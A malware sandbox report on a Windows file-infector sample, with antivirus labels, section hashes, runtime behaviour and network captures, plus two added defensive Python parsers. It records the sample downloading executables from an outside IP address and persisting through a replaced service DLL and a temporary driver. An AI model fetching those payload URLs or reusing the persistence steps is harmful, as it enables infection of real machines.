Analysis Date: 2015-09-10 11:55:02
MD5: 4ab1c713f27db35178f68250d1abf31e
SHA1: 625cf201acae3afe408b3730e29c3e680d9c7e10

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 1ff1b905e2aea726ee5a8c9fdb83f5d3 sha1: 94cdaa2d1e1276f18e17238caa308c5d510d8f63 size: 409600
Section .rdata  md5: ab3848b889fe7fc6a8cf0ea7bf5517a4 sha1: 42d0eb187d304bd4d5770d6fac067135e84c263f size: 65536
Section .data   md5: 078d419052c239198da6f32282f2ca24 sha1: eb266d859f5db3b4f7bb450cab90736dc9fa88af size: 61440
Section .rsrc   md5: fa23fdcc3c62134e1fbcc20e9f76db9d sha1: 128ff782dd03dfc82831d216d532dc30eeb032e5 size: 24576
Section .tcP]   md5: 3456b76187759e6938f1a39420da28f3 sha1: 181a1792ea5c00bf38906ff88e5beb815761bf19 size: 28672  (non-standard section name, last in the table)
Timestamp: 2014-08-22 02:49:01
Version info:
  LegalCopyright: 131-页游专用 (Chinese: "131, web-game edition")
  FileVersion: 1.0.0.0
  CompanyName: 131-1006
  Comments: 131-页游专用 (same string as LegalCopyright)
  ProductName: 131-页游专用 (same string)
  ProductVersion: 1.0.0.0
  FileDescription: 131-页游专用 (same string)
PEhash: 093b60cf41ad3bf6ac2f11dbac9436df90469c7e
IMPhash: ec6c284cc44f331d3218f38083f18d64
AV Rising: Win32.Agent.hn
AV McAfee: W32/Fujacks.ay
AV Avira (antivir): W32/Fujacks.DR
AV Twister: Suspicious.000000#0C8B/1.mg
AV Ad-Aware: Win32.Viking.AR
AV Alwil (avast): Viking-CF:Win32:Viking-CF
AV Eset (nod32): Win32/Agent.DP virus
AV Grisoft (avg): Win32/Fujacks.S
AV Symantec: W32.Loorp.A!inf
AV Fortinet: W32/Fujacks.BF!tr
AV BitDefender: Win32.Viking.AR
AV K7: Virus ( 00108a531 )
AV Microsoft Security Essentials: Virus:Win32/Viking.NK
AV MicroWorld (escan): Win32.Viking.AR
AV MalwareBytes: no_virus
AV Authentium: W32/Agent.EW.gen!Eldorado
AV Frisk (f-prot): W32/Viking.A.gen!Eldorado
AV Ikarus: Trojan-Downloader.Win32.Jadtre
AV Emsisoft: Win32.Viking.AR
AV Zillya!: Virus.Agent.Win32.34
AV Kaspersky: Virus.Win32.Agent.dp
AV Trend Micro: PE_JEEFO.D
AV CAT (quickheal): W32.Agent.DP
AV VirusBlokAda (vba32): Virus.Win32.Koklek
AV Padvish: Error Scanning File
AV BullGuard: Win32.Viking.AR
AV Arcabit (arcavir): Win32.Viking.AR
AV ClamAV: Worm.Fujack-55
AV Dr. Web: Win32.HLLW.Autoruner.8224
AV F-Secure: Win32.Viking.AR
AV CA (E-Trust Ino): Win32/Viking.D

Summary: 29 of the 31 engines listed flag the file (MalwareBytes returns no_virus, Padvish could not scan it). The family names disagree (Viking, Fujacks, Agent.dp, Loorp, Jeefo, Koklek, Autoruner, Jadtre), so treat the labels as a strong generic verdict rather than an attribution.
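The per-section md5/sha1/size rows above are what lets a retrieved copy of the sample be matched against this report. The following script is an added example, not part of the sandbox report or of any tool it was produced with: it walks the PE headers with the Python standard library only, hashes the raw bytes of every section, and diffs the result against the table above (the `REPORTED` rows are copied from the report; everything else, including the constructed `build_minimal_pe` fixture, is assumption). It assumes the report's "size" column is each section's SizeOfRawData, which fits the values shown (all multiples of 4096).

```python
# Added example, not part of the sandbox report: recompute the per-section
# md5 / sha1 / size rows of the Static Details table from a PE file with the
# standard library only. Assumption: the report's "size" is SizeOfRawData.
import hashlib
import struct
import sys

FILE_HEADER_SIZE = 20      # IMAGE_FILE_HEADER
SECTION_HEADER_SIZE = 40   # IMAGE_SECTION_HEADER


def section_rows(data):
    """One dict per section: name, md5, sha1, size (SizeOfRawData), present (bytes on disk).

    Walks MZ -> e_lfanew -> "PE\\0\\0" -> IMAGE_FILE_HEADER -> section table and
    hashes the raw on-disk bytes of each section. Names are 8 bytes, NUL-padded and
    not guaranteed to be ASCII (the table above has one called ".tcP]"), so they
    are decoded as latin-1 rather than rejected.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    file_hdr = e_lfanew + 4
    _machine, num_sections, _ts, _sym, _nsym, size_opt_hdr, _flags = struct.unpack_from(
        "<HHIIIHH", data, file_hdr)
    table = file_hdr + FILE_HEADER_SIZE + size_opt_hdr
    rows = []
    for i in range(num_sections):
        off = table + i * SECTION_HEADER_SIZE
        raw_name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        body = data[raw_ptr:raw_ptr + raw_size]   # shorter than raw_size if the file is truncated
        rows.append({
            "name": raw_name.rstrip(b"\0").decode("latin-1"),
            "md5": hashlib.md5(body).hexdigest(),
            "sha1": hashlib.sha1(body).hexdigest(),
            "size": raw_size,
            "present": len(body),
        })
    return rows


def compare_to_report(data, expected):
    """Diff a file against {name: (md5, sha1, size)}; returns a list of mismatch strings."""
    found = {r["name"]: r for r in section_rows(data)}
    problems = []
    for name, (md5, sha1, size) in expected.items():
        r = found.get(name)
        if r is None:
            problems.append(f"{name}: not present in file")
        elif (r["md5"], r["sha1"], r["size"]) != (md5, sha1, size):
            problems.append(f"{name}: md5={r['md5']} sha1={r['sha1']} size={r['size']}")
    for name in found.keys() - expected.keys():
        problems.append(f"{name}: extra section not in report")
    return problems


def build_minimal_pe(sections, file_align=0x200):
    """Constructed fixture (not a loadable binary): a PE32 skeleton holding the given
    [(name_bytes, content_bytes), ...] so the parser can be exercised offline."""
    e_lfanew, opt_size, n = 0x40, 0xE0, len(sections)
    headers_end = e_lfanew + 4 + FILE_HEADER_SIZE + opt_size + n * SECTION_HEADER_SIZE
    first_raw = -(-headers_end // file_align) * file_align        # round up to alignment
    out = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    out += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x102)
    out += struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)      # PE32 magic, rest zeroed
    raw_ptr, bodies = first_raw, b""
    for name, content in sections:
        raw_size = -(-len(content) // file_align) * file_align
        out += struct.pack("<8sIIIIIIHHI", name, len(content), 0x1000, raw_size,
                           raw_ptr, 0, 0, 0, 0, 0x60000020)
        bodies += content.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    return out.ljust(first_raw, b"\0") + bodies


REPORTED = {  # rows copied from the Static Details table above
    ".text":  ("1ff1b905e2aea726ee5a8c9fdb83f5d3", "94cdaa2d1e1276f18e17238caa308c5d510d8f63", 409600),
    ".rdata": ("ab3848b889fe7fc6a8cf0ea7bf5517a4", "42d0eb187d304bd4d5770d6fac067135e84c263f", 65536),
    ".data":  ("078d419052c239198da6f32282f2ca24", "eb266d859f5db3b4f7bb450cab90736dc9fa88af", 61440),
    ".rsrc":  ("fa23fdcc3c62134e1fbcc20e9f76db9d", "128ff782dd03dfc82831d216d532dc30eeb032e5", 24576),
    ".tcP]":  ("3456b76187759e6938f1a39420da28f3", "181a1792ea5c00bf38906ff88e5beb815761bf19", 28672),
}

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        sample = f.read()
    for r in section_rows(sample):
        print(f"Section {r['name']:<8} md5: {r['md5']} sha1: {r['sha1']} size: {r['size']}")
    print(compare_to_report(sample, REPORTED) or "all sections match the report")
```

Run it as `python check_sections.py sample.bin`; a clean run prints the same five rows as the table and "all sections match the report". A `present` value below `size` means the copy is truncated, and an extra section in the output is exactly the kind of appended code (`.tcP]` here) that file-infector families add to a host binary.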

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates File: C:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
(the batch file removes both the dropper and itself)

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2

Note: this iexplore.exe instance is started by the svchost.exe process listed below, which is why its profile writes land under the NetworkService account rather than Administrator.

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\Settings ➝ NULL
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝ 4
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝ 4
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1
Creates File: C:\Documents and Settings\NetworkService\Favorites\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Favorites\Desktop.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates Mutex: Shell.CMruPidlList
Winsock DNS: nbtj.114anhui.com

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates File: PIPE\SfcApi
Creates File: PIPE\wkssvc
Creates File: C:\WINDOWS\system32\qmgr.dll
Creates File: C:\WINDOWS\system32\mspmsnsv.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts Service: WmdmPmSN
(qmgr.dll is the BITS service DLL and mspmsnsv.dll is the service DLL of WmdmPmSN, the Portable Media Serial Number service, both hosted by svchost.exe on Windows XP; writing mspmsnsv.dll and then starting WmdmPmSN loads the dropped code into the svchost.exe process listed below, and the pipe opened first, SfcApi, is the one Windows File Protection is driven through)

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2 (SERVICE_AUTO_START: the service now starts at boot)
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\ST2ZW9EF\desktop.ini
Creates File: NtHid
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\1C2JVJXS\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\8XMZ0JQ3\desktop.ini
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\V92Y02PX\desktop.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\TEMP\NtHid.sys
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\WINDOWS\TEMP\NtHid.sys
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Process: C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2
Creates Mutex: c:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!networkservice!cookies!
Creates Mutex: c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates Service: NtHid - C:\WINDOWS\TEMP\NtHid.sys (a driver service whose image is written to TEMP and deleted again by this same process once the service exists; the "NtHid" file above is the matching device object)
Winsock DNS: 141.8.226.14
Winsock DNS: www.490a-B8B5-9B8C1E870B0C.com
Winsock DNS: www.baidu.com
Winsock DNS: pc1.114central.com
Winsock URL: http://141.8.226.14/ko/03.exe
Winsock URL: http://141.8.226.14/ko/02.exe

Process
↳ Pid 1112

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates File: WMIDataDevice

Process
↳ Pid 1852

Process
↳ Pid 1144

Network Details:

DNS: nbtj.114anhui.com (Type: A) ➝ 193.166.255.171
DNS: www.a.shifen.com (Type: A) ➝ 103.235.46.39 (the CNAME target www.baidu.com resolves through; pairs with the www.baidu.com query below)
DNS: pc1.114central.com (Type: A) ➝ 141.8.226.14
DNS: www.baidu.com (Type: A) ➝ (no address recorded)
DNS: www.490a-B8B5-9B8C1E870B0C.com (Type: A) ➝ (no address recorded)
HTTP GET: http://141.8.226.14/ko/01.exe
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://nbtj.114anhui.com/msn/163.htm?2
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://141.8.226.14/ko/02.exe
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://141.8.226.14/ko/03.exe
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
(all four requests are HTTP/1.0 with "Accept: */*" and the same fixed IE6 / Windows XP User-Agent; see the Raw Pcap section)
Flows TCP: 192.168.1.1:1032 ➝ 141.8.226.14:80
Flows TCP: 192.168.1.1:1034 ➝ 193.166.255.171:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.226.14:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.226.14:80
(three connections to 141.8.226.14 for 01.exe, 02.exe and 03.exe; one to 193.166.255.171, the address of nbtj.114anhui.com, for 163.htm)

Raw Pcap
0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6d736e 2f313633 2e68746d   GET /msn/163.htm
0x00000010 (00016)   3f322048 5454502f 312e300d 0a416363   ?2 HTTP/1.0..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000050 (00080)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000060 (00096)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000070 (00112)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x00000080 (00128)   290d0a48 6f73743a 206e6274 6a2e3131   )..Host: nbtj.11
0x00000090 (00144)   34616e68 75692e63 6f6d0d0a 436f6e6e   4anhui.com..Conn
0x000000a0 (00160)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a416c69   eep-Alive....Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a416c69   eep-Alive....Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....
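The hex dumps above are the only place the full request headers appear, so a practitioner wants them back as bytes and then as fields. The script below is an added example, not part of the sandbox report or of the tool that produced it: it decodes the report's dump format (offset, hex words, ASCII column) and parses each HTTP/1.0 request into method, target, version and headers, returning the URL, Host and User-Agent as indicators. Anything after the first CRLFCRLF is returned separately, because the 02.exe and 03.exe dumps carry nine bytes ("Alive\r\n\r\n") past the end of the request that equal the tail of the longer 163.htm request printed before them; the assumption here is buffer reuse in the dumping tool rather than bytes on the wire. `DUMP_02` is copied verbatim from the Raw Pcap section; all function names are the example's own.

```python
# Added example, not part of the sandbox report: decode the Raw Pcap hex dumps
# back into bytes and parse the HTTP/1.0 requests into indicators. Bytes after
# the first CRLFCRLF are kept apart (assumed to be dump-tool buffer residue).
import re

# Copied verbatim from the Raw Pcap section above (the /ko/02.exe request).
DUMP_02 = """\
0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a416c69   eep-Alive....Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....
"""

HEX_WORD = re.compile(r"^[0-9a-fA-F]{2,8}$")
DUMP_LINE = re.compile(r"^\s*0x[0-9a-fA-F]+\s+\(\d+\)\s+(.*)$")


def hexdump_to_bytes(dump, width=16):
    """Rebuild the bytes from "offset (decimal)   hex words   ASCII" lines.

    Hex words are consumed left to right until `width` bytes have been read or a
    token is not hex, so the ASCII column is never touched on full lines; only a
    pure-hex ASCII fragment on the short final line could be misread.
    """
    out = bytearray()
    for line in dump.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            continue
        got = 0
        for tok in m.group(1).split():
            if got >= width or len(tok) % 2 or not HEX_WORD.match(tok):
                break
            out += bytes.fromhex(tok)
            got += len(tok) // 2
    return bytes(out)


def parse_request(raw):
    """Split an HTTP request into request line, headers and leftover bytes."""
    head, sep, trailing = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("request headers are not terminated")
    lines = head.split(b"\r\n")
    method, target, version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return {
        "method": method, "target": target, "version": version, "headers": headers,
        "url": "http://" + headers.get("host", "") + target,
        "trailing": trailing,           # non-empty means bytes past the end of the request
    }


def indicators(dumps):
    """Collapse several dumps into the sorted URLs, hosts and user agents they contain."""
    urls, hosts, agents = set(), set(), set()
    for dump in dumps:
        req = parse_request(hexdump_to_bytes(dump))
        urls.add(req["url"])
        hosts.add(req["headers"].get("host", ""))
        agents.add(req["headers"].get("user-agent", ""))
    return {"urls": sorted(urls), "hosts": sorted(hosts), "user_agents": sorted(agents)}


if __name__ == "__main__":
    req = parse_request(hexdump_to_bytes(DUMP_02))
    print(req["method"], req["url"], req["version"])
    print("User-Agent:", req["headers"]["user-agent"])
    print("bytes after end of headers:", req["trailing"])
```

Paste the other three dumps in the same way and pass them all to `indicators()` to get the complete URL, host and User-Agent set in one go; for the 01.exe and 163.htm dumps `trailing` comes back empty, for 02.exe and 03.exe it is the nine stale bytes.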


Strings